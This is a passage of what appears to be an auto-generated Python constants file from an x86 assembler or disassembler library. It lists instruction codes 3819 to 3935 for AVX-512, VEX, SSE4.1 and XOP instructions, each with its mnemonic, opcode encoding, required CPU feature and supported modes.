EVEX_VPCMPUQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3819
"""
``VPCMPUQ k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3820
"""
``VPCMPUQ k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3821
"""
``VPCMPUQ k1 {k2}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 1E /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_XMM_XMMM128B32_IMM8: int = 3822
"""
``VPCMPD k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_YMM_YMMM256B32_IMM8: int = 3823
"""
``VPCMPD k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3824
"""
``VPCMPD k1 {k2}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 1F /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3825
"""
``VPCMPQ k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3826
"""
``VPCMPQ k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3827
"""
``VPCMPQ k1 {k2}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 1F /r ib``
``AVX512F``
``16/32/64-bit``
"""
PINSRB_XMM_R32M8_IMM8: int = 3828
"""
``PINSRB xmm1, r32/m8, imm8``
``66 0F 3A 20 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PINSRB_XMM_R64M8_IMM8: int = 3829
"""
``PINSRB xmm1, r64/m8, imm8``
``66 o64 0F 3A 20 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3830
"""
``VPINSRB xmm1, xmm2, r32/m8, imm8``
``VEX.128.66.0F3A.W0 20 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3831
"""
``VPINSRB xmm1, xmm2, r64/m8, imm8``
``VEX.128.66.0F3A.W1 20 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3832
"""
``VPINSRB xmm1, xmm2, r32/m8, imm8``
``EVEX.128.66.0F3A.W0 20 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3833
"""
``VPINSRB xmm1, xmm2, r64/m8, imm8``
``EVEX.128.66.0F3A.W1 20 /r ib``
``AVX512BW``
``64-bit``
"""
INSERTPS_XMM_XMMM32_IMM8: int = 3834
"""
``INSERTPS xmm1, xmm2/m32, imm8``
``66 0F 3A 21 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3835
"""
``VINSERTPS xmm1, xmm2, xmm3/m32, imm8``
``VEX.128.66.0F3A.WIG 21 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3836
"""
``VINSERTPS xmm1, xmm2, xmm3/m32, imm8``
``EVEX.128.66.0F3A.W0 21 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PINSRD_XMM_RM32_IMM8: int = 3837
"""
``PINSRD xmm1, r/m32, imm8``
``66 0F 3A 22 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PINSRQ_XMM_RM64_IMM8: int = 3838
"""
``PINSRQ xmm1, r/m64, imm8``
``66 o64 0F 3A 22 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3839
"""
``VPINSRD xmm1, xmm2, r/m32, imm8``
``VEX.128.66.0F3A.W0 22 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3840
"""
``VPINSRQ xmm1, xmm2, r/m64, imm8``
``VEX.128.66.0F3A.W1 22 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3841
"""
``VPINSRD xmm1, xmm2, r/m32, imm8``
``EVEX.128.66.0F3A.W0 22 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3842
"""
``VPINSRQ xmm1, xmm2, r/m64, imm8``
``EVEX.128.66.0F3A.W1 22 /r ib``
``AVX512DQ``
``64-bit``
"""
EVEX_VSHUFF32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3843
"""
``VSHUFF32X4 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 23 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3844
"""
``VSHUFF32X4 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 23 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3845
"""
``VSHUFF64X2 ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 23 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3846
"""
``VSHUFF64X2 zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 23 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3847
"""
``VPTERNLOGD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3848
"""
``VPTERNLOGD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3849
"""
``VPTERNLOGD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 25 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3850
"""
``VPTERNLOGQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3851
"""
``VPTERNLOGQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3852
"""
``VPTERNLOGQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 25 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_XMM_K1Z_XMMM128B32_IMM8: int = 3853
"""
``VGETMANTPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_YMM_K1Z_YMMM256B32_IMM8: int = 3854
"""
``VGETMANTPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3855
"""
``VGETMANTPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 26 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_XMM_K1Z_XMMM128B64_IMM8: int = 3856
"""
``VGETMANTPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_YMM_K1Z_YMMM256B64_IMM8: int = 3857
"""
``VGETMANTPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 26 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3858
"""
``VGETMANTPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 26 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3859
"""
``VGETMANTSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 27 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETMANTSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3860
"""
``VGETMANTSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 27 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTRB_KR_KR_IMM8: int = 3861
"""
``KSHIFTRB k1, k2, imm8``
``VEX.L0.66.0F3A.W0 30 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KSHIFTRW_KR_KR_IMM8: int = 3862
"""
``KSHIFTRW k1, k2, imm8``
``VEX.L0.66.0F3A.W1 30 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTRD_KR_KR_IMM8: int = 3863
"""
``KSHIFTRD k1, k2, imm8``
``VEX.L0.66.0F3A.W0 31 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTRQ_KR_KR_IMM8: int = 3864
"""
``KSHIFTRQ k1, k2, imm8``
``VEX.L0.66.0F3A.W1 31 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTLB_KR_KR_IMM8: int = 3865
"""
``KSHIFTLB k1, k2, imm8``
``VEX.L0.66.0F3A.W0 32 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KSHIFTLW_KR_KR_IMM8: int = 3866
"""
``KSHIFTLW k1, k2, imm8``
``VEX.L0.66.0F3A.W1 32 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_KSHIFTLD_KR_KR_IMM8: int = 3867
"""
``KSHIFTLD k1, k2, imm8``
``VEX.L0.66.0F3A.W0 33 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KSHIFTLQ_KR_KR_IMM8: int = 3868
"""
``KSHIFTLQ k1, k2, imm8``
``VEX.L0.66.0F3A.W1 33 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VINSERTI128_YMM_YMM_XMMM128_IMM8: int = 3869
"""
``VINSERTI128 ymm1, ymm2, xmm3/m128, imm8``
``VEX.256.66.0F3A.W0 38 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VINSERTI32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3870
"""
``VINSERTI32X4 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W0 38 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTI32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3871
"""
``VINSERTI32X4 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W0 38 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTI64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3872
"""
``VINSERTI64X2 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W1 38 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3873
"""
``VINSERTI64X2 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W1 38 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VEXTRACTI128_XMMM128_YMM_IMM8: int = 3874
"""
``VEXTRACTI128 xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 39 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X4_XMMM128_K1Z_YMM_IMM8: int = 3875
"""
``VEXTRACTI32X4 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 39 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X4_XMMM128_K1Z_ZMM_IMM8: int = 3876
"""
``VEXTRACTI32X4 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 39 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X2_XMMM128_K1Z_YMM_IMM8: int = 3877
"""
``VEXTRACTI64X2 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W1 39 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X2_XMMM128_K1Z_ZMM_IMM8: int = 3878
"""
``VEXTRACTI64X2 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 39 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3879
"""
``VINSERTI32X8 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W0 3A /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTI64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3880
"""
``VINSERTI64X4 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W1 3A /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTI32X8_YMMM256_K1Z_ZMM_IMM8: int = 3881
"""
``VEXTRACTI32X8 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 3B /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTI64X4_YMMM256_K1Z_ZMM_IMM8: int = 3882
"""
``VEXTRACTI64X4 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 3B /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_XMM_XMMM128_IMM8: int = 3883
"""
``VPCMPUB k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_YMM_YMMM256_IMM8: int = 3884
"""
``VPCMPUB k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUB_KR_K1_ZMM_ZMMM512_IMM8: int = 3885
"""
``VPCMPUB k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 3E /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_XMM_XMMM128_IMM8: int = 3886
"""
``VPCMPUW k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_YMM_YMMM256_IMM8: int = 3887
"""
``VPCMPUW k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 3E /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPUW_KR_K1_ZMM_ZMMM512_IMM8: int = 3888
"""
``VPCMPUW k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 3E /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_XMM_XMMM128_IMM8: int = 3889
"""
``VPCMPB k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_YMM_YMMM256_IMM8: int = 3890
"""
``VPCMPB k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPB_KR_K1_ZMM_ZMMM512_IMM8: int = 3891
"""
``VPCMPB k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 3F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_XMM_XMMM128_IMM8: int = 3892
"""
``VPCMPW k1 {k2}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_YMM_YMMM256_IMM8: int = 3893
"""
``VPCMPW k1 {k2}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 3F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPW_KR_K1_ZMM_ZMMM512_IMM8: int = 3894
"""
``VPCMPW k1 {k2}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 3F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
DPPS_XMM_XMMM128_IMM8: int = 3895
"""
``DPPS xmm1, xmm2/m128, imm8``
``66 0F 3A 40 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VDPPS_XMM_XMM_XMMM128_IMM8: int = 3896
"""
``VDPPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 40 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VDPPS_YMM_YMM_YMMM256_IMM8: int = 3897
"""
``VDPPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 40 /r ib``
``AVX``
``16/32/64-bit``
"""
DPPD_XMM_XMMM128_IMM8: int = 3898
"""
``DPPD xmm1, xmm2/m128, imm8``
``66 0F 3A 41 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VDPPD_XMM_XMM_XMMM128_IMM8: int = 3899
"""
``VDPPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 41 /r ib``
``AVX``
``16/32/64-bit``
"""
MPSADBW_XMM_XMMM128_IMM8: int = 3900
"""
``MPSADBW xmm1, xmm2/m128, imm8``
``66 0F 3A 42 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VMPSADBW_XMM_XMM_XMMM128_IMM8: int = 3901
"""
``VMPSADBW xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 42 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VMPSADBW_YMM_YMM_YMMM256_IMM8: int = 3902
"""
``VMPSADBW ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 42 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_XMM_K1Z_XMM_XMMM128_IMM8: int = 3903
"""
``VDBPSADBW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W0 42 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_YMM_K1Z_YMM_YMMM256_IMM8: int = 3904
"""
``VDBPSADBW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W0 42 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VDBPSADBW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3905
"""
``VDBPSADBW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W0 42 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VSHUFI32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3906
"""
``VSHUFI32X4 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 43 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3907
"""
``VSHUFI32X4 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 43 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3908
"""
``VSHUFI64X2 ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 43 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFI64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3909
"""
``VSHUFI64X2 zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 43 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PCLMULQDQ_XMM_XMMM128_IMM8: int = 3910
"""
``PCLMULQDQ xmm1, xmm2/m128, imm8``
``66 0F 3A 44 /r ib``
``PCLMULQDQ``
``16/32/64-bit``
"""
VEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3911
"""
``VPCLMULQDQ xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 44 /r ib``
``PCLMULQDQ and AVX``
``16/32/64-bit``
"""
VEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3912
"""
``VPCLMULQDQ ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 44 /r ib``
``VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3913
"""
``VPCLMULQDQ xmm1, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.WIG 44 /r ib``
``AVX512VL and VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3914
"""
``VPCLMULQDQ ymm1, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.WIG 44 /r ib``
``AVX512VL and VPCLMULQDQ``
``16/32/64-bit``
"""
EVEX_VPCLMULQDQ_ZMM_ZMM_ZMMM512_IMM8: int = 3915
"""
``VPCLMULQDQ zmm1, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.WIG 44 /r ib``
``AVX512F and VPCLMULQDQ``
``16/32/64-bit``
"""
VEX_VPERM2I128_YMM_YMM_YMMM256_IMM8: int = 3916
"""
``VPERM2I128 ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 46 /r ib``
``AVX2``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4: int = 3917
"""
``VPERMIL2PS xmm1, xmm2, xmm3/m128, xmm4, imm4``
``VEX.128.66.0F3A.W0 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_YMM_YMM_YMMM256_YMM_IMM4: int = 3918
"""
``VPERMIL2PS ymm1, ymm2, ymm3/m256, ymm4, imm4``
``VEX.256.66.0F3A.W0 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_XMM_XMM_XMM_XMMM128_IMM4: int = 3919
"""
``VPERMIL2PS xmm1, xmm2, xmm3, xmm4/m128, imm4``
``VEX.128.66.0F3A.W1 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PS_YMM_YMM_YMM_YMMM256_IMM4: int = 3920
"""
``VPERMIL2PS ymm1, ymm2, ymm3, ymm4/m256, imm4``
``VEX.256.66.0F3A.W1 48 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_XMM_XMM_XMMM128_XMM_IMM4: int = 3921
"""
``VPERMIL2PD xmm1, xmm2, xmm3/m128, xmm4, imm4``
``VEX.128.66.0F3A.W0 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_YMM_YMM_YMMM256_YMM_IMM4: int = 3922
"""
``VPERMIL2PD ymm1, ymm2, ymm3/m256, ymm4, imm4``
``VEX.256.66.0F3A.W0 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_XMM_XMM_XMM_XMMM128_IMM4: int = 3923
"""
``VPERMIL2PD xmm1, xmm2, xmm3, xmm4/m128, imm4``
``VEX.128.66.0F3A.W1 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VPERMIL2PD_YMM_YMM_YMM_YMMM256_IMM4: int = 3924
"""
``VPERMIL2PD ymm1, ymm2, ymm3, ymm4/m256, imm4``
``VEX.256.66.0F3A.W1 49 /r /is5``
``XOP``
``16/32/64-bit``
"""
VEX_VBLENDVPS_XMM_XMM_XMMM128_XMM: int = 3925
"""
``VBLENDVPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4A /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPS_YMM_YMM_YMMM256_YMM: int = 3926
"""
``VBLENDVPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4A /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPD_XMM_XMM_XMMM128_XMM: int = 3927
"""
``VBLENDVPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4B /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDVPD_YMM_YMM_YMMM256_YMM: int = 3928
"""
``VBLENDVPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4B /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDVB_XMM_XMM_XMMM128_XMM: int = 3929
"""
``VPBLENDVB xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 4C /r /is4``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDVB_YMM_YMM_YMMM256_YMM: int = 3930
"""
``VPBLENDVB ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 4C /r /is4``
``AVX2``
``16/32/64-bit``
"""
EVEX_VRANGEPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3931
"""
``VRANGEPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3932
"""
``VRANGEPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3933
"""
``VRANGEPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 50 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3934
"""
``VRANGEPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3935
"""
